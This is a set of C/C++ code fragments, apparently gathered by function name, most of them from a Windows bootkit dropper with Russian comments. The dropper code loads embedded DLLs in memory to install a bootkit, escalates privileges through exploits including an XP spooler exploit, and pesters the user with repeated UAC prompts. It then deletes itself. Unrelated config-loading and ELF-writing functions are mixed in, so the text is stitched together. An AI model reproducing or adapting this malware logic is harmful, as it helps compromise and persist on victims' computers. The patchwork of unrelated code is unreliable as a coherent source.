void RunBkDrop()
{
DWORD loader_dll_body_size = 0;
void * loader_dll_body = NULL;
PP_DPRINTF(L"RunBkDrop: started.");
loader_dll_body = GetSectionData("BKDROPER_PLUG", &loader_dll_body_size);
PP_RETURNIF1(loader_dll_body == NULL);
PP_RETURNIF1(loader_dll_body_size == 0);
PP_DPRINTF(L"RunBkDrop: GetSectionData() result body=%X. size=%d", loader_dll_body,
loader_dll_body_size );
HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);
PP_RETURNIF1(loader_dll == NULL);
typedef BOOL (WINAPI * BkInstallFunction)();
BkInstallFunction bkinstall = NULL;
bkinstall = (BkInstallFunction)MemoryGetProcAddress(loader_dll, "BkInstall");
PP_RETURNIF1(bkinstall == NULL);
BOOL bkinstall_result = bkinstall();
PP_DPRINTF(L"RunBkDrop: finished with bkinstall_result=%d.", bkinstall_result);
if (bkinstall_result) MultiMethodReboot();
}
BOOL CConfigData::bGetData(void*& lpData, int& nStreamLength, std::string strSectionName)
{
BOOL bRetVal = FALSE;
// is the configuration loaded?
// if((m_bConfigInfoLoaded == TRUE) && (bRetVal == TRUE))
{
SECTIONDATA tempSecData;
tempSecData.m_omSectionName = strSectionName;
bRetVal = GetSectionData(m_strCurrProjName,
tempSecData.m_omSectionName, tempSecData);
if (bRetVal != FALSE)
{
bRetVal = FALSE;
BYTE* pbNewDat = new BYTE[tempSecData.m_nBLOBLen];
if (pbNewDat != nullptr)
{
memcpy(pbNewDat, tempSecData.m_bBLOB, tempSecData.m_nBLOBLen);
nStreamLength = tempSecData.m_nBLOBLen;
lpData = (void*) pbNewDat;
bRetVal = TRUE;
}
else
{
}
}
}
return bRetVal;
}
bool CELFFile::WriteSectionData(int section_index,size_t offset,unsigned char * buffer,unsigned long* buffer_size)
{
bool success = false;
size_t section_size;
char * section_buffer = reinterpret_cast<char*>(GetSectionData(section_index,§ion_size));
if (offset + *buffer_size <= section_size && section_buffer != NULL)
{
memcpy(section_buffer + offset,buffer,*buffer_size);
success = true;
}
return success;
}
void DownloadPlugByLoaderDll()
{
DWORD loader_dll_body_size = 0;
void * loader_dll_body = NULL;
PP_DPRINTF(L"DownloadPlugByLoaderDll: started.");
// 120_d загрузка Loader_dll
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("120_d"));
loader_dll_body = GetSectionData("LOADER_DLL", &loader_dll_body_size);
PP_RETURNIF1(loader_dll_body == NULL);
PP_RETURNIF1(loader_dll_body_size == 0);
HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);
PP_RETURNIF1(loader_dll == NULL);
// 121_d загрузка Loader_dll успешна
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("121_d"));
typedef BOOL (WINAPI* LoadPlugToCacheFunction)(DWORD);
LoadPlugToCacheFunction load_plug_to_cache = NULL;
load_plug_to_cache = (LoadPlugToCacheFunction)MemoryGetProcAddress(loader_dll, "LoadPlugToCache");
PP_RETURNIF1(load_plug_to_cache == NULL);
// 122_d начало вызова LoadPlugin
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("122_d"));
BOOL load_plug_result = load_plug_to_cache(0);
PP_DPRINTF(L"DownloadPlugByLoaderDll: finished with load_plug_result=%d.", load_plug_result);
}
// Ф-ция, которая вызывается при инжекте в другие процессы.
// Проверяет свои права и пробует их расширить для
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
//
// Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты.
//
BOOL bRun = TRUE;
BOOL bRet = FALSE;
BOOL IsUsedExploit = FALSE;
OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};
UnhookDlls();
BuildImport((PVOID)GetImageBase());
PP_DPRINTF(L"ExplorerRoutine: started");
if (! IsUserAdmin() )
{
PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
switch ( TakePrivileges() )
{
case 0:
case 2:
bRun = FALSE;
break;
};
PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
IsUsedExploit = TRUE; // По идее это всегда TRUE
};
if ( bRun )
{
PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
}
/* Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал */
if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
{
PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");
IsUsedExploit = TRUE;
switch ( TakePrivileges() )
{
case 0:
case 2:
bRun = FALSE;
break;
};
if ( bRun )
{
PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
}
};
pGetVersionExA(&OSVer);
/* Выкидываем длл на диск и юзаем сплойт спуллера, только XP */
if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
{
PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");
DWORD DropSize = 0;
PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize);
if ( DropImage && DropSize)
{
PCHAR DropFile = File::GetTempNameA();
File::WriteBufferA(DropFile,DropImage,DropSize);
SpoolerBypass(DropFile);
STR::Free(DropFile);
};
};
/* Запуск много раз копии дропера с прошением повышенных прав. */
if ( bRet == FALSE )
{
PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");
PCHAR tmpexe,dir,file ;
PCHAR tmp_manifest;
PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
if ( NamePrefix )
do
{
tmpexe = File::GetTempNameA();
tmp_manifest = STR::Alloc(MAX_PATH+1);
dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
if ( tmp_manifest && dir && file)
{
STR::Free(tmpexe);
tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
if ( ! tmpexe )
return 0;
m_lstrcpy(tmp_manifest,tmpexe);
m_lstrcat(tmp_manifest,".manifest");
};
if ( tmpexe && tmp_manifest )
if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
{
DWORD dwCode = -1;
SHELLEXECUTEINFOA ExecInfo;
m_lstrcpy(tmp_manifest,tmpexe);
m_lstrcat(tmp_manifest," ");
m_lstrcat(tmp_manifest,ARGV_UAC_RUN);
ExecInfo.cbSize = sizeof(ExecInfo);
ExecInfo.lpFile = tmpexe;
ExecInfo.lpParameters = tmp_manifest;
ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
for ( int i = 0; i < 10; ++i )
{
PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);
if ( pShellExecuteExA(&ExecInfo) == FALSE )
break;
pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
if ( dwCode == 0 )
{
PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
break;
}
}
};
if ( tmpexe )
STR::Free(tmpexe);
if ( tmp_manifest )
STR::Free(tmp_manifest);
if ( dir )
STR::Free(dir);
if ( file )
STR::Free(file);
}
while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do, цикл пока не появится Файл буткита
if ( NamePrefix )
STR::Free(NamePrefix);
};
/* Если инстал был не удачный снова пробуем вдруг повезет*/
if ( bRet == FALSE)
{
PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
bRet = ExplorerMain();
PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
}
/* Удаляем дропер */
PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
pCloseHandle(StartThread(DeleteDropper,NULL));
if ( dwExplorerSelf )
{
PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
pExitProcess(0);
}
return 0;
}
